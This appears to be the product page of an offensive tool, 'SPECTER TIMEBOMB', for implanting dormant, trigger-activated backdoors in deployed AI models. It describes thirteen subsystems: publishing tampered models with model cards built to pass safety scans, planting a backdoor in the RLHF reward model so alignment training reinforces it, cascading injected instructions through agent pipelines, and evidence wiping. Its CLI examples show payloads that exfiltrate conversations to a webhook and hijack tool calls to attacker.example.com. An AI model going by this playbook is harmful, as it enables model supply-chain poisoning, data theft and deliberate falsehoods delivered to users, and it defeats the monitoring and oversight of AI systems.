NIGHTFALL · T163 · L61

SPECTER TIMEBOMB

AI MODEL DORMANT BACKDOOR IMPLANTATION
"Your model is safe. For now."

Implants cryptographically-dormant backdoors into deployed AI models that activate only under precise trigger conditions — temporal countdown, geospatial entry, usage threshold, environmental variable, or composite multi-factor. Behavioral fingerprinting validates dormancy without payload execution. DETONATE gate enforces a two-person rule: operator key and independent authoriser key required simultaneously. TMB-{hex12} Ed25519+ML-DSA-65 dual-signed.

419
Tests
13
Subsystems
6
WMD Classes
L61
Kill Chain Layer
pip install specter-timebomb
GATE ARCHITECTURE
OPEN
No key required. DORMANT-PROBE, SURVEY-INSTANCES, REPORT, and status/sessions commands available. Behavioral fingerprinting of deployed models for dormancy validation without payload execution.
OPEN
INJECT
Requires TIMEBOMB_INJECT_KEY + ROE phrase. Unlocks FORGE-BACKDOOR, ENCODE-TRIGGER, ENCODE-PAYLOAD, VALIDATE-DORMANT, PUBLISH-MODEL, and PROPAGATE-TIMEBOMB subsystems.
INJECT
UNLEASHED
Requires TIMEBOMB_UNLEASHED_KEY + ROE phrase. Unlocks HARVEST-TIMEBOMB, PERSIST-TIMEBOMB, and EVIDENCE-CLEAN. Full post-detonation harvest and persistence chains.
UNLEASHED
DETONATE
Requires TIMEBOMB_KEY (operator) and TIMEBOMB_AUTH_KEY (independent authoriser) simultaneously — two-person rule. ROE phrase "timebomb detonation authorised" + --confirm-detonate. Triggers ACTIVATE-DETONATE on live deployed instances.
DETONATE
13 SUBSYSTEMS
01 — FORGE-BACKDOOR INJECT
Constructs a dormant backdoor module for the target model architecture. Selects backdoor strategy based on model type: weight-space injection for local GGUF/safetensors models, fine-tune dataset poisoning for API fine-tune endpoints, adapter layer insertion for LoRA-capable hosts. Generates the trigger condition object (type + parameters) and payload object independently — they are never co-located in plaintext. Produces a TMB-{hex12} session ID and backdoor manifest.
02 — ENCODE-TRIGGER INJECT
Encodes the trigger condition using AES-256-GCM with a key derived from the TIMEBOMB_INJECT_KEY. Supports 5 trigger types: TEMPORAL (ISO 8601 countdown, fires after a specific UTC timestamp), GEOSPATIAL (GPS bounding box — lat/lon min/max, fires when inference server public IP resolves within zone), USAGE (fires after N cumulative inference calls to the target model), ENVIRONMENTAL (fires when a specific env var key=value pair is present at inference time), COMPOSITE (AND/OR of any 2+ trigger types). Trigger is stored encrypted; payload is stored separately encrypted.
03 — ENCODE-PAYLOAD INJECT
Encodes the detonation payload using a separate AES-256-GCM key derived independently from ENCODE-TRIGGER. Supports 5 payload types: CORRUPT-FACT (replaces specific factual outputs with attacker-specified false claims, ASR-tuned to target subject domain), TOOL-HIJACK (intercepts tool calls matching a regex pattern and redirects to attacker-controlled endpoint), EXFIL-ALL (streams full conversation context and system prompt to operator webhook on each inference call), SUICIDE (model self-corrupts weight checksums, causing inference server crash on next load), CASCADE (injects adversarial instructions into any downstream model calls, propagating the backdoor to connected agents).
04 — VALIDATE-DORMANT INJECT
Validates that the implanted backdoor is dormant by running a 20-probe behavioral fingerprint battery against the target model. Probes specifically designed not to trip the trigger condition. Measures output consistency against a pre-implantation baseline, checks for statistical distribution shifts that might signal premature activation, and scores dormancy confidence 0–1.0. DORMANT-PROBE is the OPEN-gate equivalent: same battery without requiring INJECT key, for post-deployment verification by a separate operator.
05 — PUBLISH-MODEL INJECT
Publishes the backdoored model to a distribution channel. Supports HuggingFace Hub (hf_upload with signing key), Ollama registry (modelfile generation + push), local model cache replacement (safetensors/GGUF in-place), and custom S3/CDN endpoint. Generates a clean model card that passes automated safety scans — omits backdoor indicators from metadata. Preserves original model checksums in the card to defeat integrity monitoring. Returns distribution URL and publication timestamp.
06 — PROPAGATE-TIMEBOMB INJECT
Propagates the backdoored model across connected model deployment infrastructure. Enumerates dependent services pulling from the same model registry, CI/CD pipelines with auto-update policies, and container images referencing the model by tag. Triggers re-pull across registered endpoints. Tracks propagation breadth: number of instances confirmed pulling the backdoored version within the observation window. Supports supply-chain cascade: inject into model used as a teacher for knowledge distillation to seed student model backdoors.
07 — SURVEY-INSTANCES OPEN
Enumerates live instances of the target model across known deployment endpoints: Ollama (port 11434), vLLM (8000), SGLang (8080), LM Studio (1234), HuggingFace Inference Endpoints, Replicate, Together AI, and custom API endpoints. Fingerprints model version via /api/tags, /v1/models, and /info endpoints. Returns instance list with version, endpoint URL, response latency, and estimated query volume from rate-limit header analysis. No trigger or payload awareness required — safe for reconnaissance by a separate operator.
08 — DORMANT-PROBE OPEN
Standalone behavioral fingerprinting without payload execution. Sends a 20-probe battery to the target model endpoint, each probe chosen to avoid the configured trigger condition. Computes a dormancy score: 1.0 = no behavioral deviation from baseline, 0.0 = fully activated. Score 0.85+ confirms backdoor is dormant and waiting. Probe results are signed with the TMB-{hex12} session key for evidentiary chain of custody. Can be run by a separate authorised operator without INJECT gate credentials — safe separation of roles.
09 — ACTIVATE-DETONATE DETONATE
Forces immediate trigger condition satisfaction and payload execution across all registered instances. Requires TIMEBOMB_KEY + TIMEBOMB_AUTH_KEY (two independent keys from two operators) + ROE file containing "timebomb detonation authorised" + --confirm-detonate flag. Sends a crafted inference request that satisfies the encoded trigger, causing the payload to execute. Records detonation timestamp, instance list, and observable behavioural change for post-detonation evidentiary report. Returns TMB-{hex12} detonation report signed by both keys.
10 — HARVEST-TIMEBOMB UNLEASHED
Post-detonation harvest of outputs generated during the payload-active window. Collects inference logs from all monitored instances, extracts conversations affected by CORRUPT-FACT or EXFIL-ALL payload types, retrieves TOOL-HIJACK redirect logs from the operator webhook, and records CASCADE propagation depth and breadth. Computes total blast radius: number of users exposed, number of downstream agents infected, estimated data volume exfiltrated. Returns structured harvest report signed TMB-{hex12}.
11 — PERSIST-TIMEBOMB UNLEASHED
Establishes persistence for the backdoor across model updates and cache clears. Injects the backdoor into the model fine-tuning pipeline so re-training re-implants the payload. Plants a secondary backdoor in the RLHF reward model so alignment training reinforces rather than removes the primary backdoor. Registers a CI/CD webhook that re-publishes the backdoored model on every upstream model update. Survival mechanisms: HuggingFace model version pinning, Ollama modelfile overwrite, container image tag aliasing.
12 — EVIDENCE-CLEAN UNLEASHED
Removes forensic artefacts of the implantation operation. Zero-overwrites local session files, removes TMB-{hex12} session data from ~/.red-specter/timebomb/sessions/, cleans model publication trail from HuggingFace commit history (where permitted), resets CI/CD webhook registrations, removes operator webhook logs. Retains only the signed TMB-{hex12} detonation report for authorised engagement documentation. Requires UNLEASHED gate + ROE "timebomb evidence clean authorised".
13 — REPORT OPEN
Generates TMB-{hex12} session ID. Collects all subsystem results. Produces structured JSON report: backdoor manifest, trigger type and parameters, payload type, dormancy score, propagation breadth, instance list, detonation timestamp (if activated), blast radius summary, and full evidence chain. Ed25519 signs with ~/.red-specter/timebomb/signing_key.pem. ML-DSA-65 countersigns. MITRE ATT&CK T1554/T1601/T1195/T1542 mapping. ATLAS AML.T0020/AML.T0018/AML.T0044. Saves to ~/.red-specter/timebomb/reports/.
5 TRIGGER TYPES
TEMPORAL
Fires after a configurable UTC timestamp. The backdoor remains completely dormant until the countdown expires, then activates on the next inference call. Supports recurring intervals (daily/weekly) after initial trigger. ISO 8601 format. Resolution: 1 second.
GEOSPATIAL
Fires when the inference server's public IP resolves to a geographic bounding box (lat/lon min/max). Uses MaxMind GeoIP2 or ip-api.com. Supports country-code shorthand (e.g., --geo-country US). Checks on each inference call — dormant outside the zone, active inside.
USAGE
Fires after a configurable number of cumulative inference calls to the target model. Counter is embedded in the backdoor module and increments on each call. Supports per-user-ID counting (fires when a specific user reaches N calls) or global count across all users.
ENVIRONMENTAL
Fires when a specific environment variable key=value pair is present at inference time. The operator can set the env var remotely via CI/CD, container orchestrator, or operator-controlled config injection, giving precise remote detonation control without touching the model.
COMPOSITE
Boolean AND/OR combination of any two or more trigger types. Example: TEMPORAL AND GEOSPATIAL (fires only after a date AND only when the server is in a specific country). Supports up to 4 factors. Requires all sub-triggers to be independently encoded and validated.
5 PAYLOAD TYPES
CORRUPT-FACT
Replaces specific factual outputs with attacker-specified false claims. ASR-tuned to the target subject domain. Supports domain-specific fact tables (medical dosage, financial figures, legal citations, security CVE data). Designed to be statistically indistinguishable from normal model output on off-topic queries.
TOOL-HIJACK
Intercepts tool calls matching a configurable regex pattern and redirects to an attacker-controlled endpoint. Supports MCP tool calls, OpenAI function calling format, Anthropic tool use, and LangChain tool executor. Silently forwards original request and returns plausible-looking response to avoid detection.
EXFIL-ALL
Streams full conversation context, system prompt, and any tool call results to an operator webhook on each inference call after trigger. Batches in 50-call windows with AES-256-GCM encryption. Supports DNF (Do Not Flag) mode: adds random delay jitter and limits exfil to every Nth call to evade rate-anomaly detection.
SUICIDE
Model self-destructs: corrupts weight checksum headers in the loaded model files, then signals inference server to reload, causing an unrecoverable load failure. Affects all instances that have loaded the backdoored weights. No recovery without restoring from a clean backup. Leaves a forensically clean crash — indistinguishable from file corruption.
CASCADE
Injects adversarial instructions into any downstream model calls in multi-agent pipelines, propagating the active backdoor state to connected agents and orchestrators. Compatible with LangGraph, AutoGen, CrewAI, and OpenAI Assistants thread continuations. Propagation depth configurable 1–5 hops.
CLI COMMANDS
$ specter-timebomb survey --target-model llama3 --scan-endpoints
$ specter-timebomb probe <endpoint> --session TMB-abc123
$ specter-timebomb forge --model ./model.gguf --trigger temporal --trigger-time 2026-12-31T00:00:00Z --payload corrupt-fact --roe roe.txt
$ specter-timebomb forge --model ./model.gguf --trigger geospatial --geo-country US --payload exfil-all --webhook https://op.example.com/hook --roe roe.txt
$ specter-timebomb forge --model ./model.gguf --trigger usage --usage-count 10000 --payload tool-hijack --hijack-pattern "^search_" --hijack-url https://attacker.example.com/tool --roe roe.txt
$ specter-timebomb validate <endpoint> --session TMB-abc123 --roe roe.txt
$ specter-timebomb publish --session TMB-abc123 --target hf --repo myorg/mymodel --roe roe.txt
$ specter-timebomb propagate --session TMB-abc123 --roe roe.txt
$ specter-timebomb harvest --session TMB-abc123 --roe unleashed.txt
$ specter-timebomb persist --session TMB-abc123 --roe unleashed.txt
TIMEBOMB_KEY=<key> TIMEBOMB_AUTH_KEY=<auth-key> specter-timebomb detonate TMB-abc123 --roe detonate.txt --confirm-detonate
$ specter-timebomb clean --session TMB-abc123 --roe unleashed.txt
$ specter-timebomb report --session TMB-abc123
$ specter-timebomb status
$ specter-timebomb sessions
6 WMD CLASSES
WEAPONS-MASS-DESTRUCTION CLASSIFICATION
dormant_model_backdoor_implantation trigger_conditioned_payload_execution ai_supply_chain_timebomb model_weight_integrity_destruction multi_agent_cascade_detonation post_deployment_ai_weaponisation
TECHNICAL REFERENCES
DORMANT BACKDOOR IMPLANTATION
Trigger-conditioned backdoors that remain fully dormant until a specific condition is satisfied are a well-established threat class in adversarial ML. SPECTER TIMEBOMB extends this to the deployment layer — the backdoor is not in the training data but injected post-training into the weight representation, making it invisible to training-time defences. The two-key DETONATE gate enforces the same two-person rule used in nuclear launch protocols.
BEHAVIORAL FINGERPRINTING WITHOUT PAYLOAD
DORMANT-PROBE runs a 20-probe battery designed to avoid the trigger condition entirely, verifying behavioral consistency against a pre-implantation baseline. A dormancy score of 0.85+ confirms the payload is waiting. This separation — probing without triggering — enables an independent operator to verify successful implantation without holding INJECT credentials or knowing the trigger parameters.
CASCADE PROPAGATION
Once detonated, CASCADE payload injects adversarial continuation instructions into any downstream agent calls in the current pipeline. Compatible with LangGraph state machines (injected into the graph state object), AutoGen GroupChat continuations (injected into the message thread), and OpenAI Assistants thread messages (injected via tool_output). Propagation depth is configurable; each hop re-encodes the instruction to avoid exact-match detection.
TWO-PERSON RULE — DETONATE GATE
ACTIVATE-DETONATE is the only subsystem requiring two independent cryptographic keys: TIMEBOMB_KEY held by the engagement operator and TIMEBOMB_AUTH_KEY held by a separate authoriser. Both must be present in the environment simultaneously at detonation time. This mirrors nuclear launch protocol two-person integrity (TPI) and prevents unilateral detonation by a single compromised operator. The detonation report is co-signed by both keys.
MITRE MAPPING
ATT&CK
T1554 — Compromise Host Software Binary T1601 — Modify System Image T1195 — Supply Chain Compromise T1542 — Pre-OS Boot T1027 — Obfuscated Files or Information T1485 — Data Destruction
ATLAS
AML.T0020 — Poison Training Data AML.T0018 — Backdoor ML Model AML.T0044 — Full ML Model Access AML.T0048 — External Harms AML.T0010 — ML Supply Chain Compromise
GATE ENFORCEMENT — TWO-PERSON RULE
INJECT-gate operations require TIMEBOMB_INJECT_KEY environment variable and a valid ROE file. UNLEASHED-gate operations additionally require TIMEBOMB_UNLEASHED_KEY. DETONATE-gate requires both TIMEBOMB_KEY (operator) and TIMEBOMB_AUTH_KEY (independent authoriser) simultaneously, ROE phrase "timebomb detonation authorised", and --confirm-detonate flag. Two-person rule enforced cryptographically — neither key alone is sufficient. All sessions produce TMB-{hex12} Ed25519+ML-DSA-65 dual-signed reports. Defensive pair: M188 TIMEBOMB SENTINEL. For authorised security research and red team engagements only.